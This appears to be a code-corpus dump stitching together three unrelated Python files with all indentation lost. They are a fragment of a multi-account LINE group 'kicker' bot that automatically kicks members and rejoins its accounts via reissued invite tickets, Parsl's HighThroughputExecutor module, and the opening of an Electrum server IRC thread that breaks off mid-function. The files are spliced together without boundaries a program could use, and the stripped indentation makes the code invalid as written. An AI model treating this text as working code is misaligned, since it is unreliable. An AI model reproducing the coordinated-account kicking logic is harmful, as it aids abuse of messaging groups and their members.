ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
except:
pass
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
cl.sendText
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
executor.py
|
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import datetime
import pickle
from multiprocessing import Queue
from typing import Dict # noqa F401 (used in type annotation)
from typing import List, Optional, Tuple, Union
import math
from parsl.serialize import pack_apply_message, deserialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import (
BadMessage, ScalingFailed,
DeserializationError, SerializationError,
UnsupportedFeatureError
)
from parsl.executors.status_handling import BlockProviderExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.addresses import get_all_addresses
from parsl.process_loggers import wrap_with_logs
from parsl.multiprocessing import ForkProcess
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class HighThroughputExecutor(BlockProviderExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Each of the workers in each process_worker_pool has access to its local rank through
an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process
and is an integer in the range from 0 to the number of workers per in the pool minus 1.
The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID``
and the size of the worker pool as ``PARSL_WORKER_COUNT``.
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For example:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by ``hostname`` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes.
By default, the executor will attempt to enumerate and connect through all possible addresses.
Setting an address here overrides the default behavior.
default=None
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched per node. Default: infinity
cpu_affinity: string
Whether or how each worker process sets thread affinity. Options are "none" to forgo
any CPU affinity configuration, "block" to assign adjacent cores to workers
(ex: assign 0-1 to worker 0, 2-3 to worker 1), and
"alternating" to assign cores to workers in round-robin
(ex: assign 0,2 to worker 0, 1,3 to worker 1).
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
address_probe_timeout : int | None
Managers attempt connecting over many different addesses to determine a viable address.
This option sets a time limit in seconds on the connection attempt.
Default of None implies 30s timeout set on worker.
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default: 30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: Optional[str] = None,
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
cpu_affinity: str = 'none',
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
address_probe_timeout: Optional[int] = None,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
BlockProviderExecutor.__init__(self, provider)
self.label = label
self.launch_cmd = launch_cmd
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
self.address = address
self.address_probe_timeout = address_probe_timeout
if self.address:
self.all_addresses = address
else:
self.all_addresses = ','.join(get_all_addresses())
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self._workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self._workers_per_node == float('inf'):
self._workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.run_id = None # set to the correct run_id in dfk
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
self.cpu_affinity = cpu_affinity
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-a {addresses} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_port={task_port} "
"--result_port={result_port} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"{address_probe_timeout_string} "
"--hb_threshold={heartbeat_threshold} "
"--cpu-affinity {cpu_affinity} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
address_probe_timeout_string = ""
if self.address_probe_timeout:
address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
address_probe_timeout_string=address_probe_timeout_string,
addresses=self.all_addresses,
task_port=self.worker_task_port,
result_port=self.worker_result_port,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir,
cpu_affinity=self.cpu_affinity)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = True
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
# TODO: why is this a provider property?
block_ids = []
if hasattr(self.provider, 'init_blocks'):
try:
block_ids = self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
return block_ids
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
block_ids = self.initialize_scaling()
return block_ids
@wrap_with_logs
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self.bad_state_is_set:
try:
msgs = self.incoming_q.get(timeout=1)
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
exception = deserialize(msg['exception'])
self.set_bad_state_and_fail_all(exception)
break
elif tid == -1 and 'heartbeat' in msg:
continue
task_fut = self.tasks.pop(tid)
if 'result' in msg:
result = deserialize(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s = deserialize(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = ForkProcess(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
daemon=True,
name="HTEX-Interchange"
)
self.queue_proc.start()
try:
(self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread")
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to manager: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, resource_specification, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- args (list) : List of arbitrary positional arguments.
Kwargs:
- kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if resource_specification:
logger.error("Ignoring the resource specification. "
"Parsl resource specification is not supported in HighThroughput Executor. "
"Please check WorkQueueExecutor if resource specification is needed.")
raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor')
if self.bad_state_is_set:
raise self.executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
fut = Future()
self.tasks[task_id] = fut
try:
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024)
except TypeError:
raise SerializationError(func.__name__)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return fut
@property
def scaling_enabled(self):
return self._scaling_enabled
def create_monitoring_info(self, status):
""" Create a msg for monitoring based on the poll status
"""
msg = []
for bid, s in status.items():
d = {}
d['run_id'] = self.run_id
d['status'] = s.status_name
d['timestamp'] = datetime.datetime.now()
d['executor_label'] = self.label
d['job_id'] = self.blocks.get(bid, None)
d['block_id'] = bid
msg.append(d)
return msg
@property
def workers_per_node(self) -> Union[int, float]:
return self._workers_per_node
def scale_in(self, blocks=None, block_ids=[], force=True, max_idletime=None):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
force : Bool
Used along with blocks to indicate whether blocks should be terminated by force.
When force = True, we will kill blocks regardless of the blocks being busy
When force = False, Only idle blocks will be terminated.
If the # of ``idle_blocks`` < ``blocks``, the list of jobs marked for termination
will be in the range: 0 - ``blocks``.
max_idletime: float
A time to indicate how long a block can be idle.
Used along with force = False to kill blocks that have been idle for that long.
block_ids : list
List of specific block ids to terminate. Optional
Returns
-------
List of job_ids marked for termination
"""
if block_ids:
block_ids_to_kill = block_ids
else:
managers = self.connected_managers
block_info = {}
for manager in managers:
if not manager['active']:
continue
b_id = manager['block_id']
if b_id not in block_info:
block_info[b_id] = [0, float('inf')]
block_info[b_id][0] += manager['tasks']
block_info[b_id][1] = min(block_info[b_id][1], manager['idle_duration'])
sorted_blocks = sorted(block_info.items(), key=lambda item: (item[1][1], item[1][0]))
if force is True:
block_ids_to_kill = [x[0] for x in sorted_blocks[:blocks]]
else:
if not max_idletime:
block_ids_to_kill = [x[0] for x in sorted_blocks if x[1][0] == 0][:blocks]
else:
block_ids_to_kill = []
for x in sorted_blocks:
if x[1][1] > max_idletime and x[1][0] == 0:
block_ids_to_kill.append(x[0])
if len(block_ids_to_kill) == blocks:
break
logger.debug("Selecting block ids to kill since they are idle : {}".format(
block_ids_to_kill))
logger.debug("Current blocks : {}".format(self.blocks))
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
# Potential issue with multiple threads trying to remove the same blocks
to_kill = [self.blocks[bid] for bid in block_ids_to_kill if bid in self.blocks]
r = self.provider.cancel(to_kill)
job_ids = self._filter_scale_in_ids(to_kill, r)
# to_kill block_ids are fetched from self.blocks
# If a block_id is in self.block, it must exist in self.block_mapping
block_ids_killed = [self.block_mapping[jid] for jid in job_ids]
return block_ids_killed
def _get_launch_command(self, block_id: str) -> str:
if self.launch_cmd is None:
raise ScalingFailed(self.provider.label, "No launch command")
launch_cmd = self.launch_cmd.format(block_id=block_id)
return launch_cmd
def shutdown(self):
"""Shutdown the executor, including all workers and controllers.
"""
logger.info("Attempting HighThroughputExecutor shutdown")
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
self.irc_prefix = options.get('irc_prefix')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
if not self.irc_prefix:
self.irc_prefix = 'D_'
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = self.irc_prefix + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-deviant")
def on_join(self, connection, event):
m = re.match("("+self.irc_prefix+".*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)", event.arguments[0])
if m:
